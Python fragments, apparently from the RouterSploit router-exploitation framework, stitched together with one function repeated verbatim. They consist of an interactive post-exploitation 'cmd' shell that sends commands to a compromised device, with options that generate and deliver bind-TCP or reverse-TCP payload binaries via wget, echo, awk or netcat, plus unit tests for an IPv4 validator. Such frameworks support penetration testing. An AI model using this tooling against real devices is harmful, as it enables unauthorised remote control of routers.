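def shell(exploit, architecture="", method="", **params):
    """Run an interactive command prompt bound to ``exploit``.

    Each line read from the operator is handled in one of three ways:

    * ``quit`` / ``exit`` leave the prompt.
    * ``bind_tcp <rport> <lhost> <lport>`` and ``reverse_tcp <lhost> <lport>``
      build a payload for ``architecture`` and pass it to ``Communication``,
      which is then driven according to ``method`` (``wget``, ``echo``,
      ``awk`` or ``netcat``; any other value does nothing further).
    * Anything else is forwarded verbatim to ``exploit.execute`` and the
      returned value is printed.

    Args:
        exploit: Object providing ``target`` and ``execute(cmd)``.
        architecture: Passed through to the payload builders.
        method: Name of the delivery method to invoke on ``Communication``.
        **params: Method-specific settings read below (``binary``,
            ``location``, ``shell``). A missing key raises ``KeyError``.
    """
    while True:
        # Spin until the printer queue is empty before prompting; presumably
        # this keeps queued output from interleaving with the prompt.
        while not printer_queue.empty():
            pass

        cmd = raw_input("cmd > ")

        if cmd in ["quit", "exit"]:
            return

        c = cmd.split()
        if len(c) and (c[0] == "bind_tcp" or c[0] == "reverse_tcp"):
            options = {}
            if c[0] == "bind_tcp":
                try:
                    options['technique'] = "bind_tcp"
                    # The target is validated as an IPv4 address before use.
                    options['rhost'] = validators.ipv4(exploit.target)
                    options['rport'] = int(c[1])
                    options['lhost'] = c[2]
                    options['lport'] = int(c[3])
                except Exception:
                    # Missing or non-numeric arguments, or a target that fails
                    # validation: report usage and prompt again. Previously
                    # execution fell through and failed with KeyError on the
                    # half-filled options dict; the bare ``except:`` also
                    # swallowed KeyboardInterrupt and SystemExit.
                    print_error("bind_tcp <rport> <lhost> <lport>")
                    continue

                payload = bind_tcp(architecture, options['rport'])
            elif c[0] == "reverse_tcp":
                try:
                    options['technique'] = "reverse_tcp"
                    options['lhost'] = c[1]
                    options['lport'] = int(c[2])
                except Exception:
                    # Same reasoning as the bind_tcp branch above.
                    print_error("reverse_tcp <lhost> <lport>")
                    continue

                payload = reverse_tcp(architecture, options['lhost'], options['lport'])

            communication = Communication(exploit, payload, options)

            if method == "wget":
                communication.wget(binary=params['binary'], location=params['location'])
            elif method == "echo":
                communication.echo(binary=params['binary'], location=params['location'])
            elif method == "awk":
                communication.awk(binary=params['binary'])
            elif method == "netcat":
                communication.netcat(binary=params['binary'], shell=params['shell'])
        else:
            print_info(exploit.execute(cmd))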
def test_ipv4_no_inet_pton_valid_address(self, mock_inet_pton):
    """A valid address is accepted when the mocked inet_pton raises AttributeError."""
    # NOTE(review): the patch decorator that supplies mock_inet_pton is not
    # visible here; confirm which function it replaces.
    mock_inet_pton.side_effect = AttributeError
    candidate = "127.0.0.1"
    self.assertEqual(validators.ipv4(candidate), "127.0.0.1")
def test_ipv4_invalid_address_3(self):
    """An address with an extra (fifth) segment must be rejected."""
    too_many_segments = "127.0.0.123.123"
    self.assertRaises(OptionValidationError, validators.ipv4, too_many_segments)
def test_ipv4_invalid_address_2(self):
    """An address whose last segment has four digits must be rejected."""
    four_digit_segment = "127.0.0.1234"
    self.assertRaises(OptionValidationError, validators.ipv4, four_digit_segment)
def test_ipv4_invalid_address_1(self):
    """An address with a segment above 255 must be rejected."""
    out_of_range = "127.256.0.1"
    self.assertRaises(OptionValidationError, validators.ipv4, out_of_range)
def test_ipv4_valid_address(self):
    """A well-formed dotted-quad address is returned unchanged."""
    candidate = "127.0.0.1"
    validated = validators.ipv4(candidate)
    self.assertEqual(validated, candidate)
def test_ipv4_strip_scheme_2(self):
    """A leading ``ftp://`` scheme is removed and the bare address returned."""
    with_scheme = "ftp://127.0.0.1"
    validated = validators.ipv4(with_scheme)
    self.assertEqual(validated, "127.0.0.1")
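def shell(exploit, architecture="", method="", payloads=None, **params):
    """Run the interactive ``cmd`` prompt for ``exploit``.

    Recognised commands:

    * ``quit`` / ``exit``: leave the prompt.
    * ``show payloads``: list the selectable payload names.
    * ``set payload <name>``: import and instantiate the named payload module.
    * With a payload selected: ``show options``, ``set <option> <value>``,
      ``run`` and ``back`` (deselect the payload). Other input is ignored
      while a payload is selected.
    * With no payload selected, any other input is forwarded to
      ``exploit.execute`` and the returned value is printed.

    Args:
        exploit: Object providing ``target`` and ``execute(cmd)``.
        architecture: Sub-directory name under the payloads package.
        method: Delivery method used by ``run`` (``wget``, ``echo`` or
            ``generic``).
        payloads: Optional list of selectable payload names. When empty or
            ``None`` it is built from the ``.py`` files in the architecture
            directory.
        **params: Forwarded to ``Communication``; ``exec_binary`` is
            overwritten when ``method`` is ``generic``.
    """
    path = "routersploit/modules/payloads/{}/".format(architecture)
    payload = None
    options = []

    if not payloads:
        # Default to every module file in the directory, minus __init__.py.
        payloads = [
            f.split(".")[0]
            for f in listdir(path)
            if isfile(join(path, f)) and f.endswith(".py") and f != "__init__.py"
        ]

    print_info()
    print_success("Welcome to cmd. Commands are sent to the target via the execute method.")
    print_status("Depending on the vulnerability, command's results might not be available.")
    print_status("For further exploitation use 'show payloads' and 'set payload <payload>' commands.")
    print_info()

    while True:
        # Spin until the printer queue is empty before prompting; presumably
        # this keeps queued output from interleaving with the prompt.
        while not printer_queue.empty():
            pass

        if payload is None:
            cmd_str = "\001\033[4m\002cmd\001\033[0m\002 > "
        else:
            cmd_str = "\001\033[4m\002cmd\001\033[0m\002 (\033[94m{}\033[0m) > ".format(
                payload._Exploit__info__['name'])

        cmd = raw_input(cmd_str)

        if cmd in ["quit", "exit"]:
            return

        elif cmd == "show payloads":
            print_status("Available payloads:")
            for payload_name in payloads:
                print_info("- {}".format(payload_name))

        elif cmd.startswith("set payload "):
            c = cmd.split(" ")

            # Only names present in `payloads` reach import_module, so typed
            # input cannot select an arbitrary module. A caller-supplied
            # `payloads` list is trusted as-is and is not checked against the
            # directory listing.
            if c[2] in payloads:
                payload_path = path.replace("/", ".") + c[2]
                payload = getattr(importlib.import_module(payload_path), 'Exploit')()

                options = []
                for option in payload.exploit_attributes.keys():
                    if option not in ["output", "filepath"]:
                        options.append([
                            option,
                            getattr(payload, option),
                            payload.exploit_attributes[option],
                        ])

                if payload.handler == "bind_tcp":
                    # The target is validated as an IPv4 address before it is
                    # shown as an option.
                    options.append(["rhost", validators.ipv4(exploit.target), "Target IP address"])

                    if method == "wget":
                        options.append(["lhost", "", "Connect-back IP address for wget"])
                        options.append(["lport", 4545, "Connect-back Port for wget"])
            else:
                print_error("Payload not available")

        elif payload is not None:
            if cmd == "show options":
                headers = ("Name", "Current settings", "Description")

                print_info('\nPayload Options:')
                print_table(headers, *options)
                print_info()

            elif cmd.startswith("set "):
                c = cmd.split(" ")
                if len(c) != 3:
                    print_error("set <option> <value>")
                else:
                    # setattr is reached only for names already listed in
                    # `options`, so other attributes of the payload object
                    # cannot be overwritten from the prompt.
                    for option in options:
                        if option[0] == c[1]:
                            try:
                                setattr(payload, c[1], c[2])
                            except Exception:
                                print_error("Invalid value for {}".format(c[1]))
                                break

                            option[1] = c[2]
                            print_success("{'" + c[1] + "': '" + c[2] + "'}")

            elif cmd == "run":
                data = payload.generate()

                if method == "wget":
                    elf_binary = payload.generate_elf(data)
                    communication = Communication(exploit, elf_binary, options, **params)
                    if communication.wget() is False:
                        continue

                elif method == "echo":
                    elf_binary = payload.generate_elf(data)
                    communication = Communication(exploit, elf_binary, options, **params)
                    communication.echo()

                elif method == "generic":
                    params['exec_binary'] = data
                    communication = Communication(exploit, "", options, **params)

                else:
                    # Previously an unrecognised method left `communication`
                    # unbound and the handler call below raised NameError.
                    print_error("Unsupported method '{}'".format(method))
                    continue

                if payload.handler == "bind_tcp":
                    communication.bind_tcp()
                elif payload.handler == "reverse_tcp":
                    communication.reverse_tcp()

            elif cmd == "back":
                payload = None

        else:
            print_status("Executing '{}' on the device...".format(cmd))
            print_info(exploit.execute(cmd))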
def test_ipv4_no_inet_pton_invalid_address_1(self, mock_inet_pton):
    """A segment above 255 is rejected when the mocked inet_pton raises AttributeError."""
    # NOTE(review): the patch decorator that supplies mock_inet_pton is not
    # visible here; confirm which function it replaces.
    mock_inet_pton.side_effect = AttributeError
    out_of_range = "127.256.0.1"
    self.assertRaises(OptionValidationError, validators.ipv4, out_of_range)
def test_ipv4_no_inet_pton_invalid_address_3(self, mock_inet_pton):
    """An extra segment is rejected when the mocked inet_pton raises AttributeError."""
    # NOTE(review): the patch decorator that supplies mock_inet_pton is not
    # visible here; confirm which function it replaces.
    mock_inet_pton.side_effect = AttributeError
    too_many_segments = "127.0.0.123.123"
    self.assertRaises(OptionValidationError, validators.ipv4, too_many_segments)
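def shell(exploit, architecture="", method="", payloads=None, **params):
    """Run the interactive ``cmd`` prompt for ``exploit``.

    Recognised commands:

    * ``quit`` / ``exit``: leave the prompt.
    * ``show payloads``: list the selectable payload names.
    * ``set payload <name>``: import and instantiate the named payload module.
    * With a payload selected: ``show options``, ``set <option> <value>``,
      ``run`` and ``back`` (deselect the payload). Other input is ignored
      while a payload is selected.
    * With no payload selected, any other input is forwarded to
      ``exploit.execute`` and the returned value is printed.

    Args:
        exploit: Object providing ``target`` and ``execute(cmd)``.
        architecture: Sub-directory name under the payloads package.
        method: Delivery method used by ``run`` (``wget``, ``echo`` or
            ``generic``).
        payloads: Optional list of selectable payload names. When empty or
            ``None`` it is built from the ``.py`` files in the architecture
            directory.
        **params: Forwarded to ``Communication``; ``exec_binary`` is
            overwritten when ``method`` is ``generic``.
    """
    path = "routersploit/modules/payloads/{}/".format(architecture)
    payload = None
    options = []

    if not payloads:
        # Default to every module file in the directory, minus __init__.py.
        payloads = [
            f.split(".")[0]
            for f in listdir(path)
            if isfile(join(path, f)) and f.endswith(".py") and f != "__init__.py"
        ]

    print_info()
    print_success("Welcome to cmd. Commands are sent to the target via the execute method.")
    print_status("Depending on the vulnerability, command's results might not be available.")
    print_status("For further exploitation use 'show payloads' and 'set payload <payload>' commands.")
    print_info()

    while True:
        # Spin until the printer queue is empty before prompting; presumably
        # this keeps queued output from interleaving with the prompt.
        while not printer_queue.empty():
            pass

        if payload is None:
            cmd_str = "\001\033[4m\002cmd\001\033[0m\002 > "
        else:
            cmd_str = "\001\033[4m\002cmd\001\033[0m\002 (\033[94m{}\033[0m) > ".format(
                payload._Exploit__info__['name'])

        cmd = raw_input(cmd_str)

        if cmd in ["quit", "exit"]:
            return

        elif cmd == "show payloads":
            print_status("Available payloads:")
            for payload_name in payloads:
                print_info("- {}".format(payload_name))

        elif cmd.startswith("set payload "):
            c = cmd.split(" ")

            # Only names present in `payloads` reach import_module, so typed
            # input cannot select an arbitrary module. A caller-supplied
            # `payloads` list is trusted as-is and is not checked against the
            # directory listing.
            if c[2] in payloads:
                payload_path = path.replace("/", ".") + c[2]
                payload = getattr(importlib.import_module(payload_path), 'Exploit')()

                options = []
                for option in payload.exploit_attributes.keys():
                    if option not in ["output", "filepath"]:
                        options.append([
                            option,
                            getattr(payload, option),
                            payload.exploit_attributes[option],
                        ])

                if payload.handler == "bind_tcp":
                    # The target is validated as an IPv4 address before it is
                    # shown as an option.
                    options.append(["rhost", validators.ipv4(exploit.target), "Target IP address"])

                    if method == "wget":
                        options.append(["lhost", "", "Connect-back IP address for wget"])
                        options.append(["lport", 4545, "Connect-back Port for wget"])
            else:
                print_error("Payload not available")

        elif payload is not None:
            if cmd == "show options":
                headers = ("Name", "Current settings", "Description")

                print_info('\nPayload Options:')
                print_table(headers, *options)
                print_info()

            elif cmd.startswith("set "):
                c = cmd.split(" ")
                if len(c) != 3:
                    print_error("set <option> <value>")
                else:
                    # setattr is reached only for names already listed in
                    # `options`, so other attributes of the payload object
                    # cannot be overwritten from the prompt.
                    for option in options:
                        if option[0] == c[1]:
                            try:
                                setattr(payload, c[1], c[2])
                            except Exception:
                                print_error("Invalid value for {}".format(c[1]))
                                break

                            option[1] = c[2]
                            print_success("{'" + c[1] + "': '" + c[2] + "'}")

            elif cmd == "run":
                data = payload.generate()

                if method == "wget":
                    elf_binary = payload.generate_elf(data)
                    communication = Communication(exploit, elf_binary, options, **params)
                    if communication.wget() is False:
                        continue

                elif method == "echo":
                    elf_binary = payload.generate_elf(data)
                    communication = Communication(exploit, elf_binary, options, **params)
                    communication.echo()

                elif method == "generic":
                    params['exec_binary'] = data
                    communication = Communication(exploit, "", options, **params)

                else:
                    # Previously an unrecognised method left `communication`
                    # unbound and the handler call below raised NameError.
                    print_error("Unsupported method '{}'".format(method))
                    continue

                if payload.handler == "bind_tcp":
                    communication.bind_tcp()
                elif payload.handler == "reverse_tcp":
                    communication.reverse_tcp()

            elif cmd == "back":
                payload = None

        else:
            print_status("Executing '{}' on the device...".format(cmd))
            print_info(exploit.execute(cmd))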